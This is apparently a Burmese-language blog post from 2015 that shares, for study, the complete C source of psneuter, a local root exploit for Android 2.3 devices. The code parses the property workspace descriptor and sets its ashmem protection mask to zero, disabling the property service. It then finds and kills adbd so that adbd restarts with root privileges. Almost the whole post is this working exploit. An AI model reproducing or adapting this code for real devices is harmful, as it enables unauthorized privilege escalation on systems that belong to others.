Thursday, December 3, 2015

android 2.3 series ေတြကို root လုပ္တဲ့အခါမွာ သံုးေလ့ရွိတဲ့ exploit ဖိုင္တစ္ခုျဖစ္တဲ့ psneuter ရဲ႕ source code

android 2.3 series ေတြကို root လုပ္တဲ့အခါမွာ သံုးေလ့ရွိတဲ့ exploit ဖိုင္တစ္ခုျဖစ္တဲ့ psneuter ရဲ႕ source code ပါ... ဒီ source ကိုေလ့လာၾကည့္ရင္ manual root ကို ဘယ္လို လုပ္လို႔ရမယ္ဆိုတာ သိသြားပါလိမ့္မယ္... 2.3 ေတြအတြက္ဘဲဆိုေပမဲ့ သေဘာတရားျခင္းတူတဲ့အတြက္ေၾကာင့္မို႔... တစ္ခ်ဳိ႕ေသာ partition ေတြကို ျပင္ဆင္လိုက္တာနဲ႕ က်န္တဲ့ version ေတြကို ရသြားပါလိမ့္မယ္... တစ္ခုေတာ့ရွိတယ္... android kernel ရဲ႕ ဖြဲ႕စည္းပံုကိုေတာ့ မျဖစ္မေနသိထားဖို႔လိုပါတယ္... Google မွာ ရွာရင္ေတာ့ ရႏိုင္ပါတယ္... သို႔ေပမဲ့ အေတာ္ေလးစိတ္ရွည္မွျဖစ္လိမ့္မယ္... ဘာလို႔လည္းဆိုေတာ့... ကိုုယ္ရွာတာနဲ႕ မဆိုင္တာေတြ အမ်ားႀကီးေတြ႕တတ္တယ္... ေနာက္ၿပီး ေတြ႔ေတာ့လည္း ဘာမွန္းမသိတာေတြျဖစ္တတ္တယ္... code ေတြကို ေလ့လာၾကည့္ၾကပါ...
xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#include <errno.h>
#include <limits.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <dirent.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#include <linux/ioctl.h>
/* Android ashmem ioctl interface, reproduced inline so the program builds
 * without the kernel/bionic headers. NOTE(review): the magic byte (0x77) and
 * the command numbers are copied from the ashmem driver header of this era;
 * verify them against the target kernel's linux/ashmem.h before reusing them. */
#define ASHMEM_NAME_LEN 256
/* ioctl "type" byte. The name starts with a double underscore (reserved for the
 * implementation) only because it mirrors the kernel header's spelling. */
#define __ASHMEMIOC 0x77
#define ASHMEM_SET_NAME _IOW(__ASHMEMIOC, 1, char[ASHMEM_NAME_LEN])
#define ASHMEM_GET_NAME _IOR(__ASHMEMIOC, 2, char[ASHMEM_NAME_LEN])
#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
#define ASHMEM_GET_SIZE _IO(__ASHMEMIOC, 4)
/* The only request this program actually issues (main() passes a mask of 0).
 * Presumably it restricts which protections later mmap()s of the region may
 * request -- that semantics lives in the driver, not in this file. */
#define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long)
#define ASHMEM_GET_PROT_MASK _IO(__ASHMEMIOC, 6)
/* struct ashmem_pin is never declared in this file, so these two expand
 * sizeof on an incomplete type and would fail to compile at any use site.
 * They are unused here, so the macros are harmless as long as that stays true. */
#define ASHMEM_PIN _IOW(__ASHMEMIOC, 7, struct ashmem_pin)
#define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
#define ASHMEM_GET_PIN_STATUS _IO(__ASHMEMIOC, 9)
#define ASHMEM_PURGE_ALL_CACHES _IO(__ASHMEMIOC, 10)
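/*
 * psneuter: Gingerbread-era (Android 2.3) local root helper.
 *
 * What this file does, step by step:
 *   1. Parse ANDROID_PROPERTY_WORKSPACE ("<fd>,<size>") from the environment.
 *   2. mmap() that (inherited) ashmem fd read-only, then issue
 *      ioctl(ASHMEM_SET_PROT_MASK, 0) on it.
 *   3. Locate the running /sbin/adbd via /proc/<pid>/cmdline and SIGTERM it.
 *
 * The intended effect, as the "property service neutered" message and the
 * surrounding write-up imply, is that the property area can no longer be
 * mapped by whatever opens it next, so the restarted adbd cannot read the
 * properties it consults at startup. Whether that actually happens depends on
 * the ashmem driver and on adbd, neither of which is visible here.
 * NOTE(review): this is a dated local-privilege-escalation PoC for 2.3 devices;
 * do not expect the ashmem behaviour it relies on to exist on anything newer.
 */

#ifndef PATH_MAX
#define PATH_MAX 4096 /* POSIX does not guarantee PATH_MAX; Linux's value */
#endif

/*
 * Parse "<fd>,<size>" into *fd_out / *sz_out without modifying the environment
 * string (the original wrote a NUL into getenv()'s buffer).
 *
 * Returns 0 on success, -1 when the string is not of that shape: no digits
 * before the comma, no comma, no digits after it, a negative fd, an fd that
 * does not fit in int, or a size <= 0 (mmap() would reject it anyway).
 * Characters after the size digits are tolerated, as atol() tolerated them.
 */
static int parse_workspace(const char *ws, int *fd_out, long *sz_out)
{
    char *end = NULL;
    long fd;
    long sz;

    errno = 0;
    fd = strtol(ws, &end, 10);
    if (end == ws || *end != ',' || errno == ERANGE || fd < 0 || fd > INT_MAX)
        return -1;

    const char *szstr = end + 1;
    errno = 0;
    sz = strtol(szstr, &end, 10);
    if (end == szstr || errno == ERANGE || sz <= 0)
        return -1;

    *fd_out = (int)fd;
    *sz_out = sz;
    return 0;
}

/*
 * Walk /proc and return the pid of the first process whose cmdline's argv[0]
 * is exactly "/sbin/adbd".
 *
 * Returns the pid, 0 if nothing matched, or -1 if /proc could not be opened.
 * Entries whose cmdline cannot be opened or read are reported on stderr and
 * skipped; an empty cmdline (kernel threads and zombies typically have one)
 * is skipped silently instead of being compared against stale buffer contents.
 */
static pid_t find_adbd_pid(void)
{
    DIR *proc = opendir("/proc");
    struct dirent *ent;
    pid_t found = 0;

    if (!proc)
        return -1;

    while (found == 0 && (ent = readdir(proc)) != NULL) {
        char path[PATH_MAX];
        char cmdline[PATH_MAX];
        int cfd;
        ssize_t n;

        /* only all-digit names are pid directories */
        if (ent->d_name[0] == '\0' ||
            strspn(ent->d_name, "0123456789") != strlen(ent->d_name))
            continue;

        /* bounded build of the path; truncation cannot happen for a real
         * d_name but is never allowed to pass silently */
        if (snprintf(path, sizeof path, "/proc/%s/cmdline", ent->d_name) >= (int)sizeof path)
            continue;

        cfd = open(path, O_RDONLY);
        if (cfd < 0) {
            fprintf(stderr, "Failed to open cmdline for pid %s\n", ent->d_name);
            continue;
        }
        /* leave room for the terminator: the original read a full PATH_MAX
         * and then strcmp()'d a buffer that was not guaranteed to hold a NUL */
        n = read(cfd, cmdline, sizeof cmdline - 1);
        close(cfd);
        if (n < 0) {
            fprintf(stderr, "Failed to read cmdline for pid %s\n", ent->d_name);
            continue;
        }
        if (n == 0)
            continue;
        /* /proc/<pid>/cmdline is NUL-separated, so the compare below stops at argv[0] */
        cmdline[n] = '\0';

        if (strcmp(cmdline, "/sbin/adbd") == 0)
            found = (pid_t)strtol(ent->d_name, NULL, 10);
    }
    closedir(proc);
    return found;
}

/*
 * Entry point. Exit status 0 when adbd was signalled, 1 on any failure
 * (each failure prints a one-line reason on stderr first).
 */
int main(int argc, char **argv, char **envp)
{
    const char *workspace;
    int fd;
    long sz;
    char *ppage;
    pid_t adbdpid;

    (void)argc;
    (void)argv;
    (void)envp;

    /* unbuffered so the progress lines are visible even if we die mid-way */
    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stderr, 0, _IONBF, 0);

    workspace = getenv("ANDROID_PROPERTY_WORKSPACE");
    if (!workspace) {
        fprintf(stderr, "Couldn't get workspace.\n");
        exit(1);
    }
    if (parse_workspace(workspace, &fd, &sz) < 0) {
        fprintf(stderr, "Incorrect format of ANDROID_PROPERTY_WORKSPACE environment variable?\n");
        exit(1);
    }

    /* The mapping itself is never dereferenced. It is kept because the
     * original did it before the ioctl; whether the driver needs an existing
     * mapping for the mask change to take effect is not verifiable here. */
    ppage = mmap(0, (size_t)sz, PROT_READ, MAP_SHARED, fd, 0);
    if (ppage == MAP_FAILED) {
        fprintf(stderr, "mmap() failed. %s\n", strerror(errno));
        exit(1);
    }

    /* fd was inherited from init, so this acts on the shared ashmem region,
     * not on a private copy -- that is the whole point of the program. */
    if (ioctl(fd, ASHMEM_SET_PROT_MASK, 0)) {
        fprintf(stderr, "Failed to set prot mask (%s)\n", strerror(errno));
        exit(1);
    }
    printf("property service neutered.\n");
    printf("killing adbd. (should restart in a second or two)\n");

    adbdpid = find_adbd_pid();
    if (adbdpid < 0) {
        fprintf(stderr, "Failed to open /proc? kill adbd manually... somehow\n");
        exit(1);
    }
    if (adbdpid == 0) {
        fprintf(stderr, "Failed to find adbd pid :(\n");
        exit(1);
    }
    if (kill(adbdpid, SIGTERM)) {
        fprintf(stderr, "Failed to kill adbd (%s)\n", strerror(errno));
        exit(1);
    }
    /* mapping and fd are released by process exit */
    return 0;
}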
